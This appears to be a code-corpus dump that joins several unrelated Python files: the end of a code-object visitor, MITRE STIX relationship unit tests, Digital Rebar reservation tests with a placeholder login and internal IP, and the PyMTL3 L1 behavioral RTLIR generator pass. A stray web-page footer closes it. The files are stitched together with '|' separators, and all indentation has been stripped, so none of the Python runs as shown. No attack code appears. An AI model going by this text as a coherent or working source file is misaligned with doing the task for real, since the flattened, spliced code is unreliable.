# This is a CodeType object (because it has co_consts). Visit co_consts,
# and then the CodeType object itself.
new_consts = []
changed = False
for const in c.co_consts:
new_const = visit(const, visitor)
changed |= new_const is not const
new_consts.append(new_const)
if changed:
c = copy.copy(c)
c.co_consts = new_consts
return visitor.visit_code(c)
else:
return c
|
<filename>stix/test/common/related_test.py
# Copyright (c) 2017, The MITRE Corporation. All rights reserved.
# See LICENSE.txt for complete terms.
import unittest
from stix.test import EntityTestCase, assert_warnings
from stix.utils import silence_warnings
from stix.common.related import (
RelatedCampaign, RelatedCampaignRef, RelatedIdentity, RelatedCOA,
RelatedPackage, RelatedPackageRef, RelatedExploitTarget, RelatedIncident,
RelatedIndicator, RelatedObservable, RelatedThreatActor, RelatedTTP,
RelatedPackageRefs, RelatedPackages, RelatedReports, RelatedReport
)
class RelatedReportTests(EntityTestCase, unittest.TestCase):
klass = RelatedReport
_full_dict = {
'confidence': {'value': {'value': "Medium", 'xsi:type':'stixVocabs:HighMediumLowVocab-1.0'}},
'information_source': {
'description': "Source of the relationship",
},
'relationship': "Associated",
'report': {
'id': 'example:bar-1',
'version': '1.0',
'header': {
'title': 'Test'
}
}
}
class RelatedReportsTests(EntityTestCase, unittest.TestCase):
klass = RelatedReports
_full_dict = {
'scope': 'inclusive',
'related_reports': [
{
'confidence': {'value': {'value': "Medium", 'xsi:type':'stixVocabs:HighMediumLowVocab-1.0'}},
'information_source': {
'description': "Source of the relationship",
},
'relationship': "Associated",
'report': {
'id': 'example:bar-1',
'version': '1.2',
'header': {
'title': 'Test'
}
}
},
{
'confidence': {'value': {'value': "Medium", 'xsi:type':'stixVocabs:HighMediumLowVocab-1.0'}},
'information_source': {
'description': "Source of the relationship",
},
'relationship': "Associated",
'report': {
'id': 'example:bar-2',
'version': '1.2',
'header': {
'title': 'Test'
}
}
}
]
}
class RelatedPackageRefsTests(EntityTestCase, unittest.TestCase):
klass = RelatedPackageRefs
_full_dict = {
'packages': [
{
'idref': "example:foo-1",
'timestamp': "2014-01-31T06:14:46",
'confidence': {'value': {'value': "Medium", 'xsi:type':'stixVocabs:HighMediumLowVocab-1.0'}},
'information_source': {
'description': "Source of the relationship",
},
'relationship': "Associated"
},
{
'idref': "example:foo--2",
'timestamp': "2014-01-31T06:14:46",
'confidence': {'value': {'value': "Medium", 'xsi:type':'stixVocabs:HighMediumLowVocab-1.0'}},
'information_source': {
'description': "Source of the relationship",
},
'relationship': "Associated"
}
]
}
@silence_warnings
def test_add_stix_package(self):
from stix.core import STIXPackage
l = RelatedPackageRefs()
l.append(STIXPackage())
self.assertEqual(1, len(l))
@silence_warnings
def test_add_bad_type(self):
from stix.indicator import Indicator
l = RelatedPackageRefs()
self.assertRaises(
TypeError,
l.append,
Indicator()
)
@assert_warnings
def test_deprecated_warning(self):
from stix.core import STIXPackage
l = RelatedPackageRefs()
l.append(STIXPackage())
class RelatedPackageRefTests(EntityTestCase, unittest.TestCase):
klass = RelatedPackageRef
_full_dict = {
'idref': "example:Campaign-133",
'timestamp': "2014-01-31T06:14:46",
'confidence': {'value': {'value': "Medium", 'xsi:type':'stixVocabs:HighMediumLowVocab-1.0'}},
'information_source': {
'description': "Source of the relationship",
},
'relationship': "Associated",
}
class RelatedCampaignTests(EntityTestCase, unittest.TestCase):
klass = RelatedCampaign
_full_dict = {
'confidence': {'value': {'value': "Medium", 'xsi:type':'stixVocabs:HighMediumLowVocab-1.0'}},
'information_source': {
'description': "Source of the relationship",
},
'relationship': "Associated",
'campaign': {
'id': 'example:bar-1',
'title': 'Test'
}
}
class RelatedIndicatorTests(EntityTestCase, unittest.TestCase):
klass = RelatedIndicator
_full_dict = {
'confidence': {'value': {'value': "Medium", 'xsi:type':'stixVocabs:HighMediumLowVocab-1.0'}},
'information_source': {
'description': "Source of the relationship",
},
'relationship': "Associated",
'indicator': {
'id': 'example:bar-1',
'title': 'Test'
}
}
class RelatedIncidentTests(EntityTestCase, unittest.TestCase):
klass = RelatedIncident
_full_dict = {
'confidence': {'value': {'value': "Medium", 'xsi:type':'stixVocabs:HighMediumLowVocab-1.0'}},
'information_source': {
'description': "Source of the relationship",
},
'relationship': "Associated",
'incident': {
'id': 'example:bar-1',
'title': 'Test'
}
}
class RelatedExploitTargetTests(EntityTestCase, unittest.TestCase):
klass = RelatedExploitTarget
_full_dict = {
'confidence': {'value': {'value': "Medium", 'xsi:type':'stixVocabs:HighMediumLowVocab-1.0'}},
'information_source': {
'description': "Source of the relationship",
},
'relationship': "Associated",
'exploit_target': {
'id': 'example:bar-1',
'title': 'Test'
}
}
class RelatedThreatActorTests(EntityTestCase, unittest.TestCase):
klass = RelatedThreatActor
_full_dict = {
'confidence': {'value': {'value': "Medium", 'xsi:type':'stixVocabs:HighMediumLowVocab-1.0'}},
'information_source': {
'description': "Source of the relationship",
},
'relationship': "Associated",
'threat_actor': {
'id': 'example:bar-1',
'title': 'Test'
}
}
class RelatedCOATests(EntityTestCase, unittest.TestCase):
klass = RelatedCOA
_full_dict = {
'confidence': {'value': {'value': "Medium", 'xsi:type':'stixVocabs:HighMediumLowVocab-1.0'}},
'information_source': {
'description': "Source of the relationship",
},
'relationship': "Associated",
'course_of_action': {
'id': 'example:bar-1',
'title': 'Test'
}
}
class RelatedTTPTests(EntityTestCase, unittest.TestCase):
klass = RelatedTTP
_full_dict = {
#'confidence': {'value': {'value': "Medium", 'xsi:type':'stixVocabs:HighMediumLowVocab-1.0'}},
'information_source': {
'description': "Source of the relationship",
},
#'relationship': "Associated",
# 'ttp': {
# 'id': 'example:bar-1',
# 'title': 'Test'
# }
}
class RelatedIdentityTests(EntityTestCase, unittest.TestCase):
klass = RelatedIdentity
_full_dict = {
'confidence': {'value': {'value': "Medium", 'xsi:type':'stixVocabs:HighMediumLowVocab-1.0'}},
'information_source': {
'description': "Source of the relationship",
},
'relationship': "Associated",
'identity': {
'id': 'example:bar-1',
'name': 'Test'
}
}
class RelatedObservableTests(EntityTestCase, unittest.TestCase):
klass = RelatedObservable
_full_dict = {
'confidence': {'value': {'value': "Medium", 'xsi:type':'stixVocabs:HighMediumLowVocab-1.0'}},
'information_source': {
'description': "Source of the relationship",
},
'relationship': "Associated",
'observable': {
'id': 'example:bar-1',
'title': 'Test'
}
}
class RelatedPackageTests(EntityTestCase, unittest.TestCase):
klass = RelatedPackage
_full_dict = {
'confidence': {'value': {'value': "Medium", 'xsi:type':'stixVocabs:HighMediumLowVocab-1.0'}},
'information_source': {
'description': "Source of the relationship",
},
'relationship': "Associated",
'package': {
'id': 'example:bar-1',
'version': '1.2',
'stix_header': {
'title': 'Test'
}
}
}
class RelatedPackagesTests(EntityTestCase, unittest.TestCase):
klass = RelatedPackages
_full_dict = {
'scope': 'inclusive',
'related_packages': [
{
'confidence': {'value': {'value': "Medium", 'xsi:type':'stixVocabs:HighMediumLowVocab-1.0'}},
'information_source': {
'description': "Source of the relationship",
},
'relationship': "Associated",
'package': {
'id': 'example:bar-1',
'version': '1.2',
'stix_header': {
'title': 'Test'
}
}
},
{
'confidence': {'value': {'value': "Medium", 'xsi:type':'stixVocabs:HighMediumLowVocab-1.0'}},
'information_source': {
'description': "Source of the relationship",
},
'relationship': "Associated",
'package': {
'id': 'example:bar-2',
'version': '1.2',
'stix_header': {
'title': 'Test'
}
}
}
]
}
class RelatedCampaignRefTests(EntityTestCase, unittest.TestCase):
klass = RelatedCampaignRef
_full_dict = {
'confidence': {'value': {'value': "Medium", 'xsi:type':'stixVocabs:HighMediumLowVocab-1.0'}},
'information_source': {
'description': "Source of the relationship",
},
'relationship': "Associated",
'campaign': {
'idref': "example:foo-1",
'timestamp': "2014-01-31T06:14:46",
'names': ["foo", "bar"]
}
}
if __name__ == "__main__":
unittest.main()
|
# Copyright 2018 Cable Television Laboratories, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
from drp_python.reservation import Reservation, get_all_reservations
from drp_python.subnet import Subnet
from drp_python.network_layer.http_session import HttpSession
from drp_python.exceptions.drb_exceptions import NotFoundError, \
AlreadyExistsError
from drp_python.model_layer.reservation_config_model import \
ReservationConfigModel
from drp_python.model_layer.subnet_config_model import SubnetConfigModel
import logging
from uuid import uuid4
logging.basicConfig(
format='%(asctime)s,%(msecs)d %(levelname)-8s [%(filename)s:%(lineno)d] '
'%(message)s',
datefmt='%d-%m-%Y:%H:%M:%S',
level=logging.WARNING)
logger = logging.getLogger('drp-python')
# TODO: Replace this with some kinda of inject for address and such
login = {'username': 'rocketskates', 'password': '<PASSWORD>'}
reservation_object = {
'ip': "10.197.111.12",
'mac': "10:7d:1a:68:0d:2f",
'name': 'Admin_Interface',
'type': 'management',
}
subnet_object = {
'address': '10.197.111.0',
'broadcast_address': '10.197.111.255',
'default_lease': 7200,
'dn': 'cablelabs.com',
'dns': '8.8.8.8',
'listen_iface': 'eno1',
'max_lease': 7200,
'name': 'subnet-' + str(uuid4()),
'netmask': '255.255.255.0',
'range': '10.197.111.12 10.197.111.16',
'router': '10.197.111.1',
'next_server': '10.197.111.131',
'type': 'management'
}
class ReservationTest(unittest.TestCase):
def setUp(self):
self.session = HttpSession('https://10.197.113.126:8092',
login['username'],
login['password'])
self.reservation_config_model = ReservationConfigModel(
**reservation_object)
self.reservation = Reservation(self.session,
self.reservation_config_model)
self.subnet_config = SubnetConfigModel(**subnet_object)
self.subnet = Subnet(self.session, self.subnet_config)
if not self.subnet.is_valid():
self.subnet.create()
temp = self.subnet.get()
self.assertEqual(self.subnet_config.address, temp.address)
def tearDown(self):
if self.reservation is not None:
self.reservation.delete()
if self.subnet is not None:
self.subnet.delete()
"""
Tests for functions located in ReservationHttps
1. Create it if it doesn't exist
2. Verify the reservation_model equals the reservation_config
3. Update the reservation
4. Verify the update matches the reservation_config
5. Get all reservations
6. Validate the count
7. Delete the reservation
8. Validate it was deleted
"""
def test_basic_create_reservation_flow(self):
if not self.reservation.is_valid():
self.reservation.create()
model = self.reservation.get()
self.assertEqual(model.name, self.reservation_config_model.name)
self.assertEqual(model.ip, self.reservation_config_model.ip)
self.assertEqual(model.mac, self.reservation_config_model.mac)
self.assertEqual(model.type, self.reservation_config_model.type)
self.assertEquals(model.extension, {})
self.assertTrue(model.available)
self.assertEqual(model.errors, [])
self.assertTrue(model.validated)
self.assertFalse(model.read_only)
temp = get_all_reservations(self.session)
count = len(temp)
self.reservation.delete()
self.assertFalse(self.reservation.is_valid())
temp = get_all_reservations(self.session)
self.assertEqual(len(temp), count - 1)
try:
self.reservation.get()
self.fail('Resource should be deleted')
except NotFoundError:
self.assertTrue(True)
def test_create_existing_reservation_flow(self):
self.reservation.create()
self.assertTrue(self.reservation.is_valid())
try:
self.reservation.create()
self.fail('Should throw already exists error')
except AlreadyExistsError as error:
print error
|
<reponame>hsqforfun/pymtl3
#=========================================================================
# BehavioralRTLIRGenL1Pass.py
#=========================================================================
# Author : <NAME>
# Date : Oct 20, 2018
"""Provide L1 behavioral RTLIR generation pass."""
import ast
import copy
import pymtl3.dsl as dsl
from pymtl3.datatypes import Bits, concat, reduce_and, reduce_or, reduce_xor, sext, zext
from pymtl3.passes.BasePass import BasePass, PassMetadata
from pymtl3.passes.rtlir.errors import PyMTLSyntaxError
from . import BehavioralRTLIR as bir
class BehavioralRTLIRGenL1Pass( BasePass ):
def __call__( s, m ):
"""Generate RTLIR for all upblks of m."""
if not hasattr( m, '_pass_behavioral_rtlir_gen' ):
m._pass_behavioral_rtlir_gen = PassMetadata()
m._pass_behavioral_rtlir_gen.rtlir_upblks = {}
visitor = BehavioralRTLIRGeneratorL1( m )
upblks = {
'CombUpblk' : list(m.get_update_blocks() - m.get_update_ff()),
'SeqUpblk' : list(m.get_update_ff())
}
# Sort the upblks by their name
upblks['CombUpblk'].sort( key = lambda x: x.__name__ )
upblks['SeqUpblk'].sort( key = lambda x: x.__name__ )
for upblk_type in ( 'CombUpblk', 'SeqUpblk' ):
for blk in upblks[ upblk_type ]:
visitor._upblk_type = upblk_type
upblk_info = m.get_update_block_info( blk )
upblk = visitor.enter( blk, upblk_info[-1] )
upblk.is_lambda = upblk_info[0]
upblk.src = upblk_info[1]
upblk.lino = upblk_info[2]
upblk.filename = upblk_info[3]
m._pass_behavioral_rtlir_gen.rtlir_upblks[ blk ] = upblk
class BehavioralRTLIRGeneratorL1( ast.NodeVisitor ):
def __init__( s, component ):
s.component = component
def enter( s, blk, ast ):
"""Entry point of RTLIR generation."""
s.blk = blk
# s.globals contains a dict of the global namespace of the module where
# blk was defined
s.globals = blk.__globals__
# s.closure contains the free variables defined in an enclosing scope.
# Basically this is the model instance s.
s.closure = {}
for i, var in enumerate( blk.__code__.co_freevars ):
try:
s.closure[ var ] = blk.__closure__[ i ].cell_contents
except ValueError:
pass
ret = s.visit( ast )
ret.component = s.component
return ret
def get_call_obj( s, node ):
if hasattr(node, "starargs") and node.starargs:
raise PyMTLSyntaxError( s.blk, node, 'star argument is not supported!')
if hasattr(node, "kwargs") and node.kwargs:
raise PyMTLSyntaxError( s.blk, node,
'double-star argument is not supported!')
if node.keywords:
raise PyMTLSyntaxError( s.blk, node, 'keyword argument is not supported!')
if not isinstance( node.func, ast.Name ):
raise PyMTLSyntaxError( s.blk, node,
f'{node.func} is called but is not a name!')
func = node.func
# Find the corresponding object of node.func field
# TODO: Support Verilog task?
# if func in s.mapping:
# The node.func field corresponds to a member of this class
# obj = s.mapping[ func ][ 0 ]
# else:
try:
# An object in global namespace is used
if func.id in s.globals:
obj = s.globals[ func.id ]
# An object in closure is used
elif func.id in s.closure:
obj = s.closure[ func.id ]
else:
raise NameError
except NameError:
raise PyMTLSyntaxError( s.blk, node,
node.func.id + ' function is not found!' )
return obj
def visit_Module( s, node ):
if len( node.body ) != 1 or \
not isinstance( node.body[0], ast.FunctionDef ):
raise PyMTLSyntaxError( s.blk, node,
'Update blocks should have exactly one FuncDef!' )
ret = s.visit( node.body[0] )
ret.ast = node
return ret
def visit_FunctionDef( s, node ):
"""Return the behavioral RTLIR of function node.
We do not need to check the decorator list -- the fact that we are
visiting this node ensures this node was added to the upblk
dictionary through s.update() (or other PyMTL decorators) earlier!
"""
# Check the arguments of the function
if node.args.args or node.args.vararg or node.args.kwarg:
raise PyMTLSyntaxError( s.blk, node,
'Update blocks should not have arguments!' )
# Save the name of the upblk
s._upblk_name = node.name
# Get the type of upblk from ._upblk_type variable
ret = eval( 'bir.' + s._upblk_type + '( node.name, [] )' )
for stmt in node.body:
ret.body.append( s.visit( stmt ) )
ret.ast = node
return ret
def visit_Assign( s, node ):
if len( node.targets ) != 1:
raise PyMTLSyntaxError( s.blk, node,
'Assigning to multiple targets is not allowed!' )
value = s.visit( node.value )
target = s.visit( node.targets[0] )
ret = bir.Assign( target, value, blocking = True )
ret.ast = node
return ret
def visit_AugAssign( s, node ):
"""Return the behavioral RTLIR of a non-blocking assignment
If the given AugAssign is not non-blocking assignment, throw PyMTLSyntaxError
"""
if isinstance( node.op, ast.LShift ):
value = s.visit( node.value )
target = s.visit( node.target )
ret = bir.Assign( target, value, blocking = False )
ret.ast = node
return ret
raise PyMTLSyntaxError( s.blk, node,
'invalid operation: augmented assignment is not non-blocking assignment!' )
def visit_Call( s, node ):
"""Return the behavioral RTLIR of method calls.
Some data types are interpreted as function calls in the Python AST.
Example: Bits4(2)
These are converted to different RTLIR nodes in different contexts.
"""
obj = s.get_call_obj( node )
if ( obj == copy.copy ) or ( obj == copy.deepcopy ):
if len( node.args ) != 1:
raise PyMTLSyntaxError( s.blk, node,
f'copy method {obj} takes exactly 1 argument!')
ret = s.visit( node.args[0] )
ret.ast = node
return ret
# Now that we have the live Python object, there are a few cases that
# we need to treat separately:
# 1. Instantiation: Bits16( 10 ) where obj is an instance of Bits
# Bits16( 1+2 ), Bits16( s.STATE_A )?
# 2. concat()
# 3. zext(), sext()
# TODO: support the following
# 4. reduce_and(), reduce_or(), reduce_xor()
# 5. Real function call: not supported yet
# Deal with Bits type cast
if isinstance(obj, type) and issubclass( obj, Bits ):
nbits = obj.nbits
if len( node.args ) != 1:
raise PyMTLSyntaxError( s.blk, node,
'exactly one argument should be given to Bits!' )
value = s.visit( node.args[0] )
ret = bir.SizeCast( nbits, value )
ret.ast = node
return ret
# concat method
elif obj is concat:
if len( node.args ) < 1:
raise PyMTLSyntaxError( s.blk, node,
'at least one argument should be given to concat!' )
values = [s.visit(c) for c in node.args]
ret = bir.Concat( values )
ret.ast = node
return ret
# zext method
elif obj is zext:
if len( node.args ) != 2:
raise PyMTLSyntaxError( s.blk, node,
'exactly two arguments should be given to zext!' )
nbits = s.visit( node.args[1] )
value = s.visit( node.args[0] )
ret = bir.ZeroExt( nbits, value )
ret.ast = node
return ret
# sext method
elif obj is sext:
if len( node.args ) != 2:
raise PyMTLSyntaxError( s.blk, node,
'exactly two arguments should be given to sext!' )
nbits = s.visit( node.args[1] )
value = s.visit( node.args[0] )
ret = bir.SignExt( nbits, value )
ret.ast = node
return ret
# reduce methods
elif obj is reduce_and or obj is reduce_or or obj is reduce_xor:
if obj is reduce_and:
op = bir.BitAnd()
elif obj is reduce_or:
op = bir.BitOr()
elif obj is reduce_xor:
op = bir.BitXor()
if len( node.args ) != 1:
raise PyMTLSyntaxError( s.blk, node,
f'exactly two arguments should be given to reduce {op} methods!' )
value = s.visit( node.args[0] )
ret = bir.Reduce( op, value )
ret.ast = node
return ret
else:
# Only Bits class instantiation is supported at L1
raise PyMTLSyntaxError( s.blk, node,
f'Unrecognized method call {obj.__name__}!' )
def visit_Attribute( s, node ):
ret = bir.Attribute( s.visit( node.value ), node.attr )
ret.ast = node
return ret
def visit_Subscript( s, node ):
value = s.visit( node.value )
if isinstance( node.slice, ast.Slice ):
if node.slice.step is not None:
raise PyMTLSyntaxError( s.blk, node,
'Slice with steps is not supported!' )
lower, upper = s.visit( node.slice )
ret = bir.Slice( value, lower, upper )
ret.ast = node
return ret
# signal[ index ]
# index might be a slice object!
if isinstance( node.slice, ast.Index ):
idx = s.visit( node.slice )
# If we have a static slice object then use it
if isinstance( idx, bir.FreeVar ) and isinstance( idx.obj, slice ):
slice_obj = idx.obj
if slice_obj.step is not None:
raise PyMTLSyntaxError( s.blk, node,
'Slice with steps is not supported!' )
assert isinstance( slice_obj.start, int ) and \
isinstance( slice_obj.stop, int ), \
f"start and stop of slice object {slice_obj} must be integers!"
ret = bir.Slice( value,
bir.Number(slice_obj.start), bir.Number(slice_obj.stop) )
# Else this is a real index
else:
ret = bir.Index( value, idx )
ret.ast = node
return ret
raise PyMTLSyntaxError( s.blk, node,
'Illegal subscript ' + node + ' encountered!' )
def visit_Slice( s, node ):
return ( s.visit( node.lower ), s.visit( node.upper ) )
def visit_Index( s, node ):
return s.visit( node.value )
def visit_Name( s, node ):
if node.id in s.closure:
# free var from closure
obj = s.closure[ node.id ]
if isinstance( obj, dsl.Component ):
# Component freevars are an L1 thing.
if obj is not s.component:
raise PyMTLSyntaxError( s.blk, node,
f'Component {obj} is not a sub-component of {s.component}!' )
ret = bir.Base( obj )
else:
ret = bir.FreeVar( node.id, obj )
ret.ast = node
return ret
elif node.id in s.globals:
# free var from the global name space
ret = bir.FreeVar( node.id, s.globals[ node.id ] )
ret.ast = node
return ret
raise PyMTLSyntaxError( s.blk, node,
f'Temporary variable {node.id} is not supported at L1!' )
def visit_Num( s, node ):
ret = bir.Number( node.n )
ret.ast = node
return ret
def visit_If( s, node ): raise NotImplementedError()
def visit_For( s, node ): raise NotImplementedError()
def visit_BoolOp( s, node ): raise NotImplementedError()
def visit_BinOp( s, node ): raise NotImplementedError()
def visit_UnaryOp( s, node ): raise NotImplementedError()
def visit_IfExp( s, node ): raise NotImplementedError()
def visit_Compare( s, node ): raise NotImplementedError()
# $display
def visit_Print( s, node ): raise NotImplementedError()
# function
def visit_Return( s, node ): raise NotImplementedError()
# SV assertion
def visit_Assert( s, node ): raise NotImplementedError()
def visit_Expr( s, node ):
"""Return the behavioral RTLIR of an expression.
ast.Expr might be useful when a statement is only a call to a task or
a non-returning function.
"""
raise PyMTLSyntaxError(
s.blk, node, 'Stand-alone expression is not supported yet!'
)
def visit_Lambda( s, node ):
raise PyMTLSyntaxError( s.blk, node, 'invalid operation: lambda function' )
def visit_Dict( s, node ):
raise PyMTLSyntaxError( s.blk, node, 'invalid type: dict' )
def visit_Set( s, node ):
raise PyMTLSyntaxError( s.blk, node, 'invalid type: set' )
def visit_List( s, node ):
raise PyMTLSyntaxError( s.blk, node, 'invalid type: list' )
def visit_Tuple( s, node ):
raise PyMTLSyntaxError( s.blk, node, 'invalid type: tuple' )
def visit_ListComp( s, node ):
raise PyMTLSyntaxError( s.blk, node, 'invalid operation: list comprehension' )
def visit_SetComp( s, node ):
raise PyMTLSyntaxError( s.blk, node, 'invalid operation: set comprehension' )
def visit_DictComp( s, node ):
raise PyMTLSyntaxError( s.blk, node, 'invalid operation: dict comprehension' )
def visit_GeneratorExp( s, node ):
raise PyMTLSyntaxError( s.blk, node, 'invalid operation: generator expression' )
def visit_Yield( s, node ):
raise PyMTLSyntaxError( s.blk, node, 'invalid operation: yield' )
def visit_Repr( s, node ):
raise PyMTLSyntaxError( s.blk, node, 'invalid operation: repr' )
def visit_Str( s, node ):
raise PyMTLSyntaxError( s.blk, node, 'invalid operation: str' )
def visit_ClassDef( s, node ):
raise PyMTLSyntaxError( s.blk, node, 'invalid operation: classdef' )
def visit_Delete( s, node ):
raise PyMTLSyntaxError( s.blk, node, 'invalid operation: delete' )
def visit_With( s, node ):
raise PyMTLSyntaxError( s.blk, node, 'invalid operation: with' )
def visit_Raise( s, node ):
raise PyMTLSyntaxError( s.blk, node, 'invalid operation: raise' )
def visit_TryExcept( s, node ):
raise PyMTLSyntaxError( s.blk, node, 'invalid operation: try-except' )
def visit_TryFinally( s, node ):
raise PyMTLSyntaxError( s.blk, node, 'invalid operation: try-finally' )
def visit_Import( s, node ):
raise PyMTLSyntaxError( s.blk, node, 'invalid operation: import' )
def visit_ImportFrom( s, node ):
raise PyMTLSyntaxError( s.blk, node, 'invalid operation: import-from' )
def visit_Exec( s, node ):
raise PyMTLSyntaxError( s.blk, node, 'invalid operation: exec' )
def visit_Global( s, node ):
raise PyMTLSyntaxError( s.blk, node, 'invalid operation: global' )
def visit_Pass( s, node ):
raise PyMTLSyntaxError( s.blk, node, 'invalid operation: pass' )
def visit_Break( s, node ):
raise PyMTLSyntaxError( s.blk, node, 'invalid operation: break' )
def visit_Continue( s, node ):
raise PyMTLSyntaxError( s.blk, node, 'invalid operation: continue' )
def visit_While( s, node ):
raise PyMTLSyntaxError( s.blk, node, 'invalid operation: while' )
def visit_ExtSlice( s, node ):
raise PyMTLSyntaxError( s.blk, node, 'invalid operation: extslice' )
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.